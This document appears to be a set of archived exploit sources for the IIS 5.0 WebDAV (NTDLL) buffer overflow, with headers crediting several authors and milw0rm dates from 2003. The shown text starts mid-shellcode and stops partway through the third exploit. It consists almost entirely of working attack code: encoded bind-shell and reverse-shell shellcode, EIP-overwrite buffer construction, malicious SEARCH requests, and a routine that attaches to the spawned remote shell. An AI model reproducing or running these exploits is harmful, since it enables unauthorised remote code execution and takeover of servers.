"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9" "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99" "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9" "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6" "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe" "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8" "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66" "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14" "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34" "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9" "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8" "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8" "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c" "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20" "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1" "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8" "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d" "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2" "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd" "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed" "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6" "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc" "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc" "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff" "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc" "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9" "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6" "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0" "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda" "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0" "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd" "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7" "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7" "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99" "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7"; /* mov edi, ecx * xor al, al * inc al * repnz scasb * jmp edi */ char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \ "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"; /* Our code starts here */ int main (int argc, char **argv) { unsigned long ret; unsigned short port; int tport, bport, s, i, j, r, rt=0; struct hostent *h; struct sockaddr_in dst; char buffer[MAXBUF]; if (argc < 2 || argc > 5) { printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <[email protected]>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET); exit(-1); } // Default target port = 80 if (argc > 2) tport = atoi(argv[2]); else tport = 80; // Default bind port = 31337 if (argc > 3) bport = atoi(argv[3]); else bport = 31337; // Default ret value = RET if (argc > 4) ret = strtoul(argv[4], NULL, 16); else ret = RET; if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 ) { fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n"); exit(-2); } // Shellcode patching port = htons(bport); port ^= 0x9999; if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) ) { fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n"); exit(-3); } *(unsigned short *)&shellcode[PORT_OFFSET] = port; *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999; *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999; // If the last two items contain any null-bytes, exploit will fail. // WARNING: this check is not performed here. Be careful and check it for yourself! // Resolve hostname printf("[*] Resolving hostname ...\n"); if ((h = gethostbyname(argv[1])) == NULL) { fprintf(stderr, "%s: unknown hostname\n", argv[1]); exit(-4); } bcopy(h->h_addr, &dst.sin_addr, h->h_length); dst.sin_family = AF_INET; dst.sin_port = htons(tport); // Socket creation if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Failed to create socket"); exit(-5); } // Connection if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1) { perror("Failed to connect"); exit(-6); } // Build malicious string... printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff); bzero(buffer, MAXBUF); strcpy(buffer, "SEARCH /"); i = strlen(buffer); buffer[i] = NOP; // Align for RET overwrite // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-) for (j=i+1; j < i+2150; j+=2) *(unsigned short *)&buffer[j] = (unsigned short)ret; // The rest is padded with NOP's. RET address should point to this zone! for (; j < i+65535-strlen(jumpcode); j++) buffer[j] = NOP; // Then we skip the body of the HTTP request memcpy(&buffer[j], jumpcode, strlen(jumpcode)); strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n"); sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode)); strcpy(buffer+strlen(buffer), body); // This byte is used to mark the beginning of the shellcode memset(buffer+strlen(buffer), 0x01, 1); // And finally, we land into our shellcode memset(buffer+strlen(buffer), NOP, 3); strcpy(buffer+strlen(buffer), shellcode); // Send request if (send(s, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("Failed to send"); exit(-7); } printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport); // Receive response while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0) rt += r; // This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF // and an overflow would occur here. Yes, I'm lazy... :-) buffer[rt] = '\0'; if (rt > 0) printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer); else printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport); close(s); } // milw0rm.com [2003-03-24]

/* * IIS 5.0 WebDAV Exploit Xnuxer Lab * By Schizoprenic, Copyright (c) 2003 * WebDAV exploit without netcat or telnet and with pretty magic number as RET */ #include <stdio.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #define RET 0xc9c9 #define LOADLIBRARYA 0x0100107c #define GETPROCADDRESS 0x01001034 #define PORT_OFFSET 1052 #define LOADL_OFFSET 798 #define GETPROC_OFFSET 815 #define NOP 0x90 unsigned char shellcode[] = // Deepzone shellcode "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c" "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04" "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99" "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14" "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b" "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9" "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3" "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99" "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99" "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9" "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9" "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c" "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc" "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9" "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9" "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c" "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99" "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89" "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3" "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1" "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf" "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9" "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66" "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99" "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf" "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32" "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14" "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3" "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59" "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b" "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99" "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9" "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9" "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99" "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9" "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6" "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe" "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8" "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66" "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14" "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34" "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9" "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8" "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8" "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c" "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20" "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1" "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8" "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d" "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2" "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd" "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed" "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6" "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc" "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc" "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff" "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc" "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9" "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6" "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0" "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda" "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0" "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd" "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7" "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7" "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99" "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7"; char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n" "</g:searchrequest>\r\n"; void usage(char *prog) { printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n" "Bug overflow NTDLL.DLL\n" "Usage: %s <victim>\n", prog); exit(-1); } void shell(int sock) { fd_set fd_read; char buff[1024]; int n; while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; if( FD_ISSET(sock, &fd_read) ) { n=read(sock,buff,sizeof(buff)); if (n == 0) { printf ("Connection closed.\n"); exit(EXIT_FAILURE); } else if (n < 0) { perror("read remote"); exit(EXIT_FAILURE); } write(1,buff,n); } if ( FD_ISSET(0, &fd_read) ) { if((n=read(0,buff,sizeof(buff)))<=0){ perror ("read user"); exit(EXIT_FAILURE); } write(sock,buff,n); } } close(sock); } int main(int argc, char **argv) { struct hostent *he; struct sockaddr_in sock1; struct sockaddr_in sock2; unsigned short port; unsigned long ret=RET; char buffer[100000]; int sock, sck, h,i,j; if (argc != 2) usage(argv[0]); printf("Resolving %s .. ", argv[1]); if ((he = gethostbyname(argv[1])) == NULL) { fprintf(stderr, "Unknown host\n"); exit(-1); } printf("Resolved\n"); port = htons(31337); port ^= 0x9999; *(unsigned short *)&shellcode[PORT_OFFSET] = port; *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999; *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999; bcopy(he->h_addr, &sock1.sin_addr, he->h_length); sock1.sin_family = AF_INET; sock1.sin_port = htons(80); printf("[+] Attacking to %s via port: 80\n", argv[1]); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Failed to create socket"); exit(-1); } if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1) { perror("Failed to connect"); exit(-1); } bzero(buffer,100000); strcpy(buffer,"SEARCH /"); i = strlen(buffer); buffer[i] = NOP; for (j=i+1; j < i+2150; j+=2) *(unsigned short *)&buffer[j] = (unsigned short)ret; for (; j < i+65535-strlen(jumpcode); j++) buffer[j] = NOP; memcpy(&buffer[j], jumpcode, strlen(jumpcode)); strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n"); sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n" "Content-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode)); strcpy(buffer+strlen(buffer), body); memset(buffer+strlen(buffer), 0x01, 1); memset(buffer+strlen(buffer), NOP, 3); strcpy(buffer+strlen(buffer), shellcode); if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("Failed to send"); exit(-1); } printf("[+] Overflow sent, waiting for 5 seconds\n"); sleep(5); bcopy(he->h_addr, &sock2.sin_addr, he->h_length); sock2.sin_family = AF_INET; sock2.sin_port = htons(31337); printf("[+] Connecting to %s: 31337\n", argv[1]); if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Failed to create socket"); exit(-1); } if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1) { printf("[+] Unable to connect.\n" "[+] Exploitation failed, maybe blocked by firewall.\n"); close(sock); close(sck); exit(-1); } close(sock); printf("[+] Successfull, attempting to join shell ...\n\n"); shell(sck); return 0; } // milw0rm.com [2003-07-08]

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /* 29/05/2003 - by Alumni - */ /* Microsoft IIS WebDAV New Exploit */ /* spawns shell on port 32768 */ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ #include <stdio.h> #include <winsock.h> #include <windows.h> #define SHELLCODELEN 753 #define NOP 0x90 #define BUFFERLEN 1024 #define RET 0x41424344 #define GMHOFF 30 #define GPAOFF 38 #define IPOFF 161 #define DEFPORT 32768 //#define DEBUGGEE_FLOW // for debug only #ifdef DEBUGGEE_FLOW #define GMH (long)GetModuleHandle #define GPA (long)GetProcAddress #else #define GMH 0x0100107C // GetModuleHandle@ #define GPA 0x01001034 // GetProcAddress@ #endif #define XOROFF 11 #define SOFF 16 char prologue[] = "\xEB\x03" // jmp $+3 "\x58" // pop eax "\x50" // push eax "\xC3" // retn "\xE8\xF8\xFF\xFF\xFF" // call $-3 "\xB2" // mov dl, %key "\x90" // %key "\x33\xC9" // xor ecx, ecx "\x66\xB9" // mov cx, shellcodesize "\x04\x03" // shellcodesize = hex(SHELLCODELEN) "\x04\x14" // add al, 0x14 "\x30\x10" // xor byte ptr[eax], dl "\x40" // inc eax "\x66\x49" // dec cx "\x67\xE3\x02" // jcxz $+5 "\xEB\xF6" // jmp $-8 ; char shellcode[SHELLCODELEN+1] = "\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80" "\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46" "\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46" "\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81" "\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4" "\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4" "\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0" "\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b" "\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b" "\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00" "\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2" "\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b" "\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b" "\xd6\x83\xc2\x14\xb8" "\x7f\x00\x00\x01" // put your ip here (run netcat before, e.g. 127.0.0.1) "\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8" "\x80\x00" // specify connectious port here (e.g. 32768) "\x66\x89\x42" "\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76" "\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2" "\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84" "\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52" "\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00" "\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52" "\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00" "\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b" "\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43" "\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7" "\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47" "\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00" "\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00" "\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b" "\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff" "\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7" "\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7" "\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c" "\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90" "\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a" "\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52" "\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff" "\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81" "\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc" "\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08" "\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4" "\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3" "\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1" "\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00" "\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00" "\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b" "\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08" "\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52" "\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5" "\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56" "\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff" "\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f" "\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c" "\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65" "\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65" "\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b" "\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e" "\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c" "\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c" "\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72" "\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65" "\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00" "\x52\x65\x61\x64\x46\x69\x6c\x65\x00"; char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"; long retaddr, buffsize; char* buffer; unsigned long getlocalhostip() { char buff[128]; in_addr inaddr; if(!gethostname(buff,128)) { memcpy(&inaddr,gethostbyname(buff)->h_addr,4); return(inet_addr(inet_ntoa(inaddr))); } return (-1); } ULONG WINAPI AcceptThread(LPVOID lpParam) { int ln1; unsigned long slisten, sacc; sockaddr_in saddrin; slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if 